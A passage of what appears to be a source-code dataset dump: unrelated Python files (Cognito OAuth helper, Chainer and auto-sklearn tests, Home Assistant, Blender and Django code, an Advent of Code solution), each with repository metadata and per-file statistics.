return {} | 27.289377 | 80 | 0.676779 | 937 | 7,450 | 5.217716 | 0.163287 | 0.036817 | 0.025772 | 0.023931 | 0.376355 | 0.305175 | 0.220495 | 0.185314 | 0.12702 | 0.061362 | 0 | 0.004386 | 0.173691 | 7,450 | 273 | 81 | 27.289377 | 0.789799 | 0.034362 | 0 | 0.326923 | 0 | 0 | 0.076977 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.144231 | false | 0 | 0.024038 | 0.009615 | 0.331731 | 0.019231 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
6813a3ec63771ea2d7bc06478e9de5267ace0581 | 3,510 | py | Python | src/flask_cognito_lib/services/cognito_svc.py | mblackgeo/flask-cognito-lib | 4a58b5da33f67c77a0b16764b19761623368a04a | [
"MIT"
] | 2 | 2022-03-24T16:07:55.000Z | 2022-03-24T19:54:51.000Z | src/flask_cognito_lib/services/cognito_svc.py | mblackgeo/flask-cognito-lib | 4a58b5da33f67c77a0b16764b19761623368a04a | [
"MIT"
] | 1 | 2022-03-30T14:27:27.000Z | 2022-03-30T14:27:27.000Z | src/flask_cognito_lib/services/cognito_svc.py | mblackgeo/flask-cognito-lib | 4a58b5da33f67c77a0b16764b19761623368a04a | [
"MIT"
] | null | null | null | from typing import List, Optional
from urllib.parse import quote
import requests
from flask_cognito_lib.config import Config
from flask_cognito_lib.exceptions import CognitoError
from flask_cognito_lib.utils import CognitoTokenResponse
class CognitoService:
def __init__(
self,
cfg: Config,
):
self.cfg = cfg
def get_sign_in_url(
self,
code_challenge: str,
state: str,
nonce: str,
scopes: Optional[List[str]] = None,
) -> str:
"""Generate a sign URL against the AUTHORIZE endpoint
Parameters
----------
code_challenge : str
A SHA256 hash of the code verifier used for this request.
            Note only S256 is supported by AWS Cognito.
        state : str
            A random state string used to prevent cross-site request forgery
        nonce : str
            A random nonce string used to prevent replay attacks
scopes : Optional[List[str]]
An optional list of system-reserved scopes or custom scopes that
are associated with a client that can be requested.
If the client doesn't request any scopes, the authentication server
uses all scopes that are associated with the client.
Returns
-------
str
A front channel login URL for the AWS Cognito AUTHORIZE endpoint
"""
quoted_redirect_url = quote(self.cfg.redirect_url)
full_url = (
f"{self.cfg.authorize_endpoint}"
f"?response_type=code"
f"&client_id={self.cfg.user_pool_client_id}"
f"&redirect_uri={quoted_redirect_url}"
f"&state={state}"
f"&nonce={nonce}"
f"&code_challenge={code_challenge}"
"&code_challenge_method=S256"
)
if scopes is not None:
full_url += f"&scope={'+'.join(scopes)}"
return full_url
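    # Illustrative PKCE helper (an assumption, not part of this class): the
    # S256 code challenge expected above can be derived from a code verifier
    # as follows:
    #
    #   import base64, hashlib
    #   def s256_challenge(verifier: str) -> str:
    #       digest = hashlib.sha256(verifier.encode("ascii")).digest()
    #       return base64.urlsafe_b64encode(digest).rstrip(b"=").decode("ascii")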
def exchange_code_for_token(
self,
code: str,
code_verifier: str,
) -> CognitoTokenResponse:
"""Exchange a short lived authorisation code for an access token
Parameters
----------
code : str
The authorisation code after the user has logged in at the Cognito UI
code_verifier : str
The plaintext code verification secret used as the code challenge
when logging in
Returns
-------
CognitoTokenResponse
A dataclass that holds the token response from Cognito
Raises
------
CognitoError
If the request to the endpoint fails
If the endpoint returns an error code
"""
data = {
"grant_type": "authorization_code",
"client_id": self.cfg.user_pool_client_id,
"redirect_uri": self.cfg.redirect_url,
"code": code,
"code_verifier": code_verifier,
}
try:
response = requests.post(
url=self.cfg.token_endpoint,
data=data,
auth=(self.cfg.user_pool_client_id, self.cfg.user_pool_client_secret),
)
response_json = response.json()
except requests.exceptions.RequestException as e:
raise CognitoError(str(e)) from e
if "error" in response_json:
raise CognitoError(f"Cognito error : {response_json['error']}")
return CognitoTokenResponse(**response_json)
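# Illustrative end-to-end flow (hypothetical names; cfg, challenge, verifier,
# state and nonce are produced elsewhere, e.g. by the calling Flask app):
#
#   svc = CognitoService(cfg)
#   url = svc.get_sign_in_url(code_challenge=challenge, state=state, nonce=nonce)
#   # ... the user signs in at `url`, Cognito redirects back with ?code=...
#   tokens = svc.exchange_code_for_token(code=code, code_verifier=verifier)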
| 30.789474 | 86 | 0.590598 | 402 | 3,510 | 5.007463 | 0.343284 | 0.034774 | 0.021858 | 0.029806 | 0.116244 | 0.089419 | 0.081967 | 0.067561 | 0.036761 | 0 | 0 | 0.003859 | 0.335613 | 3,510 | 113 | 87 | 31.061947 | 0.859348 | 0.347863 | 0 | 0.052632 | 0 | 0 | 0.174547 | 0.107143 | 0 | 0 | 0 | 0 | 0 | 1 | 0.052632 | false | 0 | 0.105263 | 0 | 0.210526 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
6814085ba3b5101a43dc38552f50112c1c0c2e6a | 416 | py | Python | tests/integration/test_shortcuts.py | ghga-de/datameta-client | f7900027af9d7d1eff23594de79e90e75baa123a | [
"Apache-2.0"
] | 1 | 2021-07-20T12:59:09.000Z | 2021-07-20T12:59:09.000Z | tests/integration/test_shortcuts.py | ghga-de/datameta-client | f7900027af9d7d1eff23594de79e90e75baa123a | [
"Apache-2.0"
] | 11 | 2021-03-17T20:27:27.000Z | 2021-04-07T16:22:55.000Z | tests/integration/test_shortcuts.py | ghga-de/datameta-client | f7900027af9d7d1eff23594de79e90e75baa123a | [
"Apache-2.0"
] | null | null | null | from datameta_client import shortcuts
from . import fixtures
from .utils import id_in_response
def test_prevalidate_and_submission():
metadataset_record = fixtures.replace_ID(fixtures.metadataset_record)
response = shortcuts.stage_and_submit(
metadatasets_json=metadataset_record,
files_dir=fixtures.base_dir,
label="test"
)
assert id_in_response(response, has_site_id=True) | 32 | 73 | 0.774038 | 52 | 416 | 5.826923 | 0.576923 | 0.168317 | 0.079208 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.163462 | 416 | 13 | 74 | 32 | 0.87069 | 0 | 0 | 0 | 0 | 0 | 0.009592 | 0 | 0 | 0 | 0 | 0 | 0.090909 | 1 | 0.090909 | false | 0 | 0.272727 | 0 | 0.363636 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
6814a822d48a5aa8b28083b4ee3d22dfd048a7ac | 1,468 | py | Python | 2016/day10/part2.py | ceronman/AdventOfCode2015 | 87b6d93df960045b5eff1ded107ac4e2719ee6e6 | [
"MIT"
] | 4 | 2019-12-03T02:03:23.000Z | 2019-12-20T11:36:00.000Z | 2016/day10/part2.py | ceronman/AdventOfCode2015 | 87b6d93df960045b5eff1ded107ac4e2719ee6e6 | [
"MIT"
] | null | null | null | 2016/day10/part2.py | ceronman/AdventOfCode2015 | 87b6d93df960045b5eff1ded107ac4e2719ee6e6 | [
"MIT"
] | null | null | null | import re
# input_lines = '''\
# value 5 goes to bot 2
# bot 2 gives low to bot 1 and high to bot 0
# value 3 goes to bot 1
# bot 1 gives low to output 1 and high to bot 0
# bot 0 gives low to output 2 and high to output 0
# value 2 goes to bot 2'''.splitlines()
input_lines = open('input.txt')
holders = {
'bot': {},
'output': {}
}
give_commands = {}
for line in input_lines:
    match = re.match(r'value (\d+) goes to bot (\d+)', line)
if match:
value, bot_nr = match.groups()
holders['bot'].setdefault(bot_nr, []).append(value)
continue
match = re.match(r'bot (\d+) gives low to (bot|output) '
r'(\d+) and high to (bot|output) (\d+)', line)
if match:
source, low_kind, low_nr, high_kind, high_nr = match.groups()
give_commands[source] = (low_kind, low_nr, high_kind, high_nr)
ready = [h for h in holders['bot'] if len(holders['bot'][h]) == 2 ]
while ready:
for bot_nr in ready:
low_value, high_value = sorted(holders['bot'][bot_nr], key=int)
low_kind, low_nr, high_kind, high_nr = give_commands[bot_nr]
holders[low_kind].setdefault(low_nr, []).append(low_value)
holders[high_kind].setdefault(high_nr, []).append(high_value)
del holders['bot'][bot_nr]
ready = [h for h in holders['bot'] if len(holders['bot'][h]) == 2 ]
values = [ int(holders['output'][str(i)][0]) for i in range(3) ]
print(values[0] * values[1] * values[2]) | 31.913043 | 71 | 0.61376 | 242 | 1,468 | 3.590909 | 0.210744 | 0.051784 | 0.041427 | 0.041427 | 0.227848 | 0.227848 | 0.195627 | 0.195627 | 0.165708 | 0.094361 | 0 | 0.019435 | 0.228883 | 1,468 | 46 | 72 | 31.913043 | 0.748233 | 0.162125 | 0 | 0.137931 | 0 | 0 | 0.119379 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.034483 | 0 | 0.034483 | 0.034483 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
6818f1b4966a33a6d1d68e2fbd9d7dd04c95311a | 1,429 | py | Python | kinto_nexmo_verify/tests/__init__.py | Kinto/kinto-nexmo-verify | 6532ec9b5df20b338aca40d8ab3178ccf6ca33db | [
"Apache-2.0"
] | null | null | null | kinto_nexmo_verify/tests/__init__.py | Kinto/kinto-nexmo-verify | 6532ec9b5df20b338aca40d8ab3178ccf6ca33db | [
"Apache-2.0"
] | 142 | 2019-10-25T06:57:58.000Z | 2021-08-01T05:35:52.000Z | kinto_nexmo_verify/tests/__init__.py | Kinto/kinto-nexmo-verify | 6532ec9b5df20b338aca40d8ab3178ccf6ca33db | [
"Apache-2.0"
] | 1 | 2019-12-21T20:39:35.000Z | 2019-12-21T20:39:35.000Z | from unittest import mock
class AuthenticationMockMixin(object):
nexmo_verify_data = {
"request_id": "9e59abbe98204a9ebe8a36101383ec20",
"status": "0",
}
nexmo_cancel_data = {"status": "0", "command": "cancel"}
nexmo_check_data = {
"currency": "EUR",
"event_id": "0C000000F2319FC0",
"price": "0.10000000",
"request_id": "9e59abbe98204a9ebe8a36101383ec20",
"status": "0",
}
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._nexmo_patcher = mock.patch("kinto_nexmo_verify.views.requests")
def setUp(self):
super().setUp()
self.nexmo_mock = self._nexmo_patcher.start()
def tearDown(self):
super().tearDown()
self._nexmo_patcher.stop()
def mock_nexmo_verify_call(self, verify_data=None):
if verify_data is None:
verify_data = self.nexmo_verify_data
self.nexmo_mock.get.return_value.json.return_value = verify_data
def mock_nexmo_check_call(self, check_data=None):
if check_data is None:
check_data = self.nexmo_check_data
self.nexmo_mock.get.return_value.json.return_value = check_data
def mock_nexmo_cancel_call(self, cancel_data=None):
if cancel_data is None:
cancel_data = self.nexmo_cancel_data
self.nexmo_mock.get.return_value.json.return_value = cancel_data
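# Illustrative use of the mixin (the test-case base class and the view under
# test are hypothetical):
#
#   class VerifyViewTest(AuthenticationMockMixin, unittest.TestCase):
#       def test_verify_success(self):
#           self.mock_nexmo_verify_call()
#           # ... call the verify view and assert against nexmo_verify_data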
| 31.065217 | 77 | 0.654304 | 171 | 1,429 | 5.105263 | 0.274854 | 0.103093 | 0.089347 | 0.058419 | 0.268041 | 0.158076 | 0.158076 | 0.158076 | 0.158076 | 0.158076 | 0 | 0.058447 | 0.23373 | 1,429 | 45 | 78 | 31.755556 | 0.738813 | 0 | 0 | 0.114286 | 0 | 0 | 0.140658 | 0.06788 | 0 | 0 | 0 | 0 | 0 | 1 | 0.171429 | false | 0 | 0.028571 | 0 | 0.314286 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a838e1b948e05c5be4d5a837ad910541049964e0 | 1,173 | py | Python | homeassistant/components/switch/elkm1.py | dauden1184/home-assistant | f4c6d389b77d0efa86644e76604eaea5d21abdb5 | [
"Apache-2.0"
] | 4 | 2019-01-10T14:47:54.000Z | 2021-04-22T02:06:27.000Z | homeassistant/components/switch/elkm1.py | dauden1184/home-assistant | f4c6d389b77d0efa86644e76604eaea5d21abdb5 | [
"Apache-2.0"
] | 6 | 2021-02-08T21:02:40.000Z | 2022-03-12T00:52:16.000Z | homeassistant/components/switch/elkm1.py | dauden1184/home-assistant | f4c6d389b77d0efa86644e76604eaea5d21abdb5 | [
"Apache-2.0"
] | 3 | 2018-08-29T19:26:20.000Z | 2020-01-19T11:58:22.000Z | """
Support for control of ElkM1 outputs (relays).
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/switch.elkm1/
"""
from homeassistant.components.elkm1 import (
DOMAIN as ELK_DOMAIN, ElkEntity, create_elk_entities)
from homeassistant.components.switch import SwitchDevice
DEPENDENCIES = [ELK_DOMAIN]
async def async_setup_platform(hass, config, async_add_entities,
discovery_info=None):
"""Create the Elk-M1 switch platform."""
if discovery_info is None:
return
elk = hass.data[ELK_DOMAIN]['elk']
entities = create_elk_entities(hass, elk.outputs, 'output', ElkOutput, [])
async_add_entities(entities, True)
class ElkOutput(ElkEntity, SwitchDevice):
"""Elk output as switch."""
@property
def is_on(self) -> bool:
"""Get the current output status."""
return self._element.output_on
async def async_turn_on(self, **kwargs):
"""Turn on the output."""
self._element.turn_on(0)
async def async_turn_off(self, **kwargs):
"""Turn off the output."""
self._element.turn_off()
| 28.609756 | 78 | 0.681159 | 148 | 1,173 | 5.222973 | 0.439189 | 0.034929 | 0.050453 | 0.043984 | 0.062096 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005388 | 0.208866 | 1,173 | 40 | 79 | 29.325 | 0.827586 | 0.192668 | 0 | 0 | 0 | 0 | 0.01074 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.052632 | false | 0 | 0.105263 | 0 | 0.315789 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a8390ab76fff1e3d90e5baeb2c77717ef34b9218 | 2,467 | py | Python | addons/blender-skeletal-motion-animate/__init__.py | trisadmeslek/V-Sekai-Blender-tools | 0d8747387c58584b50c69c61ba50a881319114f8 | [
"MIT"
] | null | null | null | addons/blender-skeletal-motion-animate/__init__.py | trisadmeslek/V-Sekai-Blender-tools | 0d8747387c58584b50c69c61ba50a881319114f8 | [
"MIT"
] | null | null | null | addons/blender-skeletal-motion-animate/__init__.py | trisadmeslek/V-Sekai-Blender-tools | 0d8747387c58584b50c69c61ba50a881319114f8 | [
"MIT"
] | null | null | null | # Important plugin info for Blender
bl_info = {
'name': 'Skeletal Pose Transfer for Blender',
'author': 'K. S. Ernest (iFire) Lee',
'category': 'Animation',
'location': 'View 3D > Tool Shelf > Skeletal Pose Transfer',
    'description': 'Transfer skeletal pose animations',
'version': (1, 2, 1),
'blender': (2, 80, 0),
}
beta_branch = False
# If first startup of this plugin, load all modules normally
# If reloading the plugin, use importlib to reload modules
# This lets you do adjustments to the plugin on the fly without having to restart Blender
import sys
if "bpy" not in locals():
import bpy
from . import core
from . import panels
from . import operators
from . import properties
else:
import importlib
importlib.reload(core)
importlib.reload(panels)
importlib.reload(operators)
importlib.reload(properties)
classes_always_enable = [  # these classes are always registered; all non-panel UI should go in here
panels.retargeting.RetargetingPanel,
panels.info.InfoPanel,
operators.detector.DetectFaceShapes,
operators.detector.DetectActorBones,
operators.detector.SaveCustomBonesRetargeting,
operators.detector.ImportCustomBones,
operators.detector.ExportCustomBones,
operators.detector.ClearCustomBones,
operators.detector.ClearCustomShapes,
operators.actor.InitTPose,
operators.actor.ResetTPose,
operators.actor.PrintCurrentPose,
operators.retargeting.RenameVRMBones,
operators.retargeting.RenameVRMBonesStandard,
operators.retargeting.BuildBoneList,
operators.retargeting.ClearBoneList,
operators.retargeting.RetargetAnimation,
panels.retargeting.RSL_UL_BoneList,
panels.retargeting.BoneListItem,
operators.info.LicenseButton,
]
# register and unregister all classes
def register():
# Register classes
for cls in classes_always_enable:
bpy.utils.register_class(cls)
# Register all custom properties
properties.register()
# Load custom icons
core.icon_manager.load_icons()
# Load bone detection list
core.detection_manager.load_detection_lists()
def unregister():
# Unregister all classes
for cls in reversed(classes_always_enable):
try:
bpy.utils.unregister_class(cls)
except RuntimeError:
pass
# Unload all custom icons
core.icon_manager.unload_icons()
if __name__ == '__main__':
register()
| 28.686047 | 103 | 0.72274 | 274 | 2,467 | 6.408759 | 0.474453 | 0.067768 | 0.03246 | 0.017084 | 0.029613 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004034 | 0.19619 | 2,467 | 85 | 104 | 29.023529 | 0.881493 | 0.197 | 0 | 0 | 0 | 0 | 0.105691 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.033333 | false | 0.016667 | 0.2 | 0 | 0.233333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a839d82c096389366f2dfe418b713be6aa4af0af | 7,278 | py | Python | tests/chainer_tests/functions_tests/normalization_tests/test_l2_normalization.py | dydo0316/test2 | a9982a8b426dd07eb1ec4e7695a7bc546ecc6063 | [
"MIT"
] | null | null | null | tests/chainer_tests/functions_tests/normalization_tests/test_l2_normalization.py | dydo0316/test2 | a9982a8b426dd07eb1ec4e7695a7bc546ecc6063 | [
"MIT"
] | 2 | 2018-01-09T23:05:30.000Z | 2018-01-19T01:19:34.000Z | tests/chainer_tests/functions_tests/normalization_tests/test_l2_normalization.py | dydo0316/test2 | a9982a8b426dd07eb1ec4e7695a7bc546ecc6063 | [
"MIT"
] | null | null | null | import functools
import unittest
import itertools
import numpy
import six
import chainer
from chainer.backends import cuda
from chainer import functions
from chainer import gradient_check
from chainer import testing
from chainer.testing import attr
def _skip_if(cond, reason):
"""Skip test if cond(self) is True"""
def decorator(impl):
@functools.wraps(impl)
def wrapper(self, *args, **kwargs):
if cond(self):
raise unittest.SkipTest(reason)
else:
impl(self, *args, **kwargs)
return wrapper
return decorator
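# Example application of the decorator (mirrors its use on
# check_double_backward further below):
#
#   @_skip_if(lambda self: self.nonzeros is not None, 'reason for skipping')
#   def check_something(self, *args):
#       ...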
def _is_good_param(param):
# Check if 'nonzero' param is valid and meaningful. On the latter point,
# x should contain at least a zero if 'nonzeros' param is given.
return param['nonzeros'] is None \
or param['nonzeros'] < numpy.prod(param['shape'])
@testing.parameterize(*filter(_is_good_param, testing.product([
[
{'dtype': numpy.float16},
{'dtype': numpy.float32},
{'dtype': numpy.float64},
],
[
{'shape': (4, 15), 'axis': 1},
{'shape': (4,), 'axis': 0},
{'shape': (4, 3, 2, 5), 'axis': 0},
{'shape': (4, 3, 2, 5), 'axis': 1},
{'shape': (4, 3, 2, 5), 'axis': 2},
{'shape': (4, 3, 2, 5), 'axis': 3},
{'shape': (4, 3, 2), 'axis': (0, 1)},
{'shape': (4, 3, 2, 4, 3, 2, 2), 'axis': (1, 4, 3, 6)},
{'shape': (0, 2), 'axis': 1},
{'shape': (), 'axis': ()},
],
[
# nonzeros (optional int): number of nonzero elems in input
# truezero (bool): flag whether zero elems are exactly zero. If false,
# randomly-chosen small values are used.
{'eps': 1e-5, 'nonzeros': None},
{'eps': 1e-1, 'nonzeros': None},
{'eps': 1e-1, 'nonzeros': 0, 'truezero': True},
{'eps': 1e-1, 'nonzeros': 0, 'truezero': False},
{'eps': 1e-1, 'nonzeros': 2, 'truezero': True},
{'eps': 1e-1, 'nonzeros': 2, 'truezero': False},
],
])))
class TestL2Normalization(unittest.TestCase):
def setUp(self):
self.x = chainer.utils.force_array(
numpy.random.uniform(0.1, 1, self.shape)
* (1 - 2 * numpy.random.randint(2, size=self.shape)),
self.dtype)
if self.nonzeros is not None:
# Make self.x have limited number of large values
# get mask of indices to modify at
zeros = self.x.size - self.nonzeros
while True:
rand = numpy.random.uniform(0, 1, self.shape)
mask = rand <= numpy.sort(rand.ravel())[zeros - 1]
if self.x[mask].shape == (zeros,):
break
# set zeros or small values to a part of the input
if self.truezero:
self.x[mask] = 0
else:
zero_scale = 10. ** numpy.random.randint(-40, -3)
self.x[mask] = numpy.random.uniform(
-zero_scale, zero_scale, zeros)
self.gy = numpy.random.uniform(-1, 1, self.shape).astype(self.dtype)
self.ggx = numpy.random.uniform(
-1, 1, self.shape).astype(self.dtype)
if self.dtype == numpy.float16:
self.check_forward_options = {'atol': 1e-3, 'rtol': 1e-3}
else:
self.check_forward_options = {}
if self.nonzeros is None:
if self.dtype == numpy.float16:
self.check_backward_options = {
'dtype': numpy.float64, 'atol': 5e-3, 'rtol': 5e-3}
self.check_double_backward_options = {
'dtype': numpy.float64, 'atol': 1e-2, 'rtol': 1e-2}
else:
self.check_backward_options = {
'dtype': numpy.float64, 'atol': 1e-4, 'rtol': 1e-4}
self.check_double_backward_options = {
'dtype': numpy.float64, 'atol': 1e-4, 'rtol': 1e-4}
else:
self.check_backward_options = {
'dtype': numpy.float64, 'atol': 1e-2, 'rtol': 1e-2,
'eps': 1e-4}
self.check_backward_options = {
'dtype': numpy.float64, 'atol': 1e-2, 'rtol': 1e-2,
'eps': 1e-4}
def check_forward(self, x_data, axis):
eps = self.eps
x = chainer.Variable(x_data)
y = functions.normalize(x, eps=eps, axis=axis)
self.assertEqual(y.data.dtype, self.dtype)
y_data = cuda.to_cpu(y.data)
y_expect = numpy.empty_like(self.x)
shape = self.x.shape
indices = []
axis_tuple = axis if isinstance(axis, tuple) else (axis,)
for i in six.moves.range(len(shape)):
if i not in axis_tuple:
indices.append(six.moves.range(shape[i]))
else:
indices.append([slice(None)])
indices_tuple = list(itertools.product(*indices))
for index in indices_tuple:
# Note: Casting back the result of `numpy.linalg.norm` to `x.dtype`
# because old NumPy casts it to float32 when a float16 value is
# given.
numerator = numpy.linalg.norm(self.x[index]).astype(x.dtype) + eps
y_expect[index] = self.x[index] / numerator
testing.assert_allclose(y_expect, y_data, **self.check_forward_options)
def test_forward_cpu(self):
self.check_forward(self.x, self.axis)
@attr.gpu
def test_forward_gpu(self):
self.check_forward(cuda.to_gpu(self.x), self.axis)
def check_backward(self, x_data, axis, y_grad):
def f(x):
return functions.normalize(x, eps=self.eps, axis=axis)
gradient_check.check_backward(
f, x_data, y_grad, **self.check_backward_options)
def test_backward_cpu(self):
self.check_backward(self.x, self.axis, self.gy)
@attr.gpu
def test_backward_gpu(self):
self.check_backward(
cuda.to_gpu(self.x), self.axis, cuda.to_gpu(self.gy))
@_skip_if(
lambda self: self.nonzeros is not None,
'backward of L2Normalize is non-differentiable at zero vector')
def check_double_backward(self, x_data, axis, y_grad, x_grad_grad):
def f(x):
return functions.normalize(x, eps=self.eps, axis=axis)
gradient_check.check_double_backward(
f, x_data, y_grad, x_grad_grad,
**self.check_double_backward_options)
def test_double_backward_cpu(self):
self.check_double_backward(self.x, self.axis, self.gy, self.ggx)
@attr.gpu
def test_double_backward_gpu(self):
self.check_double_backward(
cuda.to_gpu(self.x), self.axis, cuda.to_gpu(self.gy),
cuda.to_gpu(self.ggx))
def check_eps(self, x_data):
x = chainer.Variable(x_data)
y = functions.normalize(x, axis=self.axis)
self.assertEqual(y.data.dtype, self.dtype)
y_data = cuda.to_cpu(y.data)
y_expect = numpy.zeros_like(self.x)
testing.assert_allclose(y_expect, y_data)
def test_eps_cpu(self):
self.check_eps(numpy.zeros_like(self.x))
@attr.gpu
def test_eps_gpu(self):
self.check_eps(cuda.to_gpu(numpy.zeros_like(self.x)))
testing.run_module(__name__, __file__)
| 35.330097 | 79 | 0.570212 | 963 | 7,278 | 4.173416 | 0.190031 | 0.028614 | 0.025877 | 0.011943 | 0.41677 | 0.348594 | 0.290371 | 0.22941 | 0.210251 | 0.189848 | 0 | 0.027253 | 0.294174 | 7,278 | 205 | 80 | 35.502439 | 0.75511 | 0.082578 | 0 | 0.23125 | 0 | 0 | 0.056448 | 0 | 0 | 0 | 0 | 0 | 0.025 | 1 | 0.11875 | false | 0 | 0.06875 | 0.01875 | 0.225 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a83be5082f23ba079872c2b2be55b119af1a7aaf | 956 | py | Python | test/test_pipeline/components/classification/test_xgradient_boosting.py | tuggeluk/auto-sklearn | 202918e5641701c696b995039d06bfec81973cc6 | [
"BSD-3-Clause"
] | null | null | null | test/test_pipeline/components/classification/test_xgradient_boosting.py | tuggeluk/auto-sklearn | 202918e5641701c696b995039d06bfec81973cc6 | [
"BSD-3-Clause"
] | null | null | null | test/test_pipeline/components/classification/test_xgradient_boosting.py | tuggeluk/auto-sklearn | 202918e5641701c696b995039d06bfec81973cc6 | [
"BSD-3-Clause"
] | null | null | null | import autosklearn.pipeline.implementations.xgb
from autosklearn.pipeline.components.classification.xgradient_boosting import \
XGradientBoostingClassifier
from .test_base import BaseClassificationComponentTest
class XGradientBoostingComponentTest(BaseClassificationComponentTest):
__test__ = True
res = dict()
res["default_iris"] = 0.94
res["iris_n_calls"] = 6
res["default_iris_iterative"] = 0.94
res["default_iris_proba"] = 0.1512353178486228
res["default_iris_sparse"] = 0.74
res["default_digits"] = 0.8160291438979964
res["digits_n_calls"] = 7
res["default_digits_iterative"] = 0.8160291438979964
res["default_digits_binary"] = 0.9823922282938676
res["default_digits_multilabel"] = 0.88
res["default_digits_multilabel_proba"] = 0.88
res['ignore_hps'] = ['n_estimators']
sk_mod = autosklearn.pipeline.implementations.xgb.CustomXGBClassifier
module = XGradientBoostingClassifier
| 34.142857 | 79 | 0.759414 | 103 | 956 | 6.757282 | 0.436893 | 0.12931 | 0.114943 | 0.106322 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.103532 | 0.141213 | 956 | 27 | 80 | 35.407407 | 0.744214 | 0 | 0 | 0 | 0 | 0 | 0.24477 | 0.128661 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.142857 | 0 | 0.380952 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a83cb39550575518f70701df5178e9726847ad82 | 2,267 | py | Python | coursereg/views/notifications.py | s-gv/bheemboy | b35c6611739b6df517cb1bb642fa6d46cf1b246e | [
"MIT"
] | null | null | null | coursereg/views/notifications.py | s-gv/bheemboy | b35c6611739b6df517cb1bb642fa6d46cf1b246e | [
"MIT"
] | 105 | 2016-05-07T05:54:28.000Z | 2016-12-30T13:47:13.000Z | coursereg/views/notifications.py | s-gv/bheemboy | b35c6611739b6df517cb1bb642fa6d46cf1b246e | [
"MIT"
] | 4 | 2016-05-29T14:00:33.000Z | 2020-09-30T17:16:02.000Z | from django.shortcuts import render, redirect
from django.core.urlresolvers import reverse
from django.http import HttpResponse
from django.contrib.auth.decorators import login_required
from django.contrib.auth import authenticate, login, logout
from django.contrib import messages
from datetime import timedelta
from coursereg import models
from django.core.mail import send_mail
from django.core.exceptions import PermissionDenied
from django.views.decorators.http import require_POST
# settings is referenced in notify() below but was never imported
from django.conf import settings
@require_POST
@login_required
def dismiss(request):
user = models.User.objects.get(id=request.POST['id'])
if not user: raise PermissionDenied
if request.user.user_type == models.User.USER_TYPE_STUDENT:
if not user == request.user: raise PermissionDenied
models.Notification.objects.filter(user=user).update(is_student_acknowledged=True)
if request.user.user_type == models.User.USER_TYPE_DCC:
if not user.department == request.user.department: raise PermissionDenied
models.Notification.objects.filter(user=user).update(is_dcc_acknowledged=True)
elif request.user.user_type == models.User.USER_TYPE_FACULTY:
if not user.adviser == request.user: raise PermissionDenied
models.Notification.objects.filter(user=user).update(is_adviser_acknowledged=True)
return redirect(request.POST.get('next', reverse('coursereg:index')))
@require_POST
@login_required
def notify(request):
if not request.user.user_type == models.User.USER_TYPE_DCC:
raise PermissionDenied
user = models.User.objects.get(id=request.POST['id'])
if not user or user.department != request.user.department:
raise PermissionDenied
user.is_dcc_review_pending = True
user.is_dcc_sent_notification = True
user.save()
models.Notification.objects.create(
user=user,
origin=models.Notification.ORIGIN_DCC,
message=request.POST['message'],
)
try:
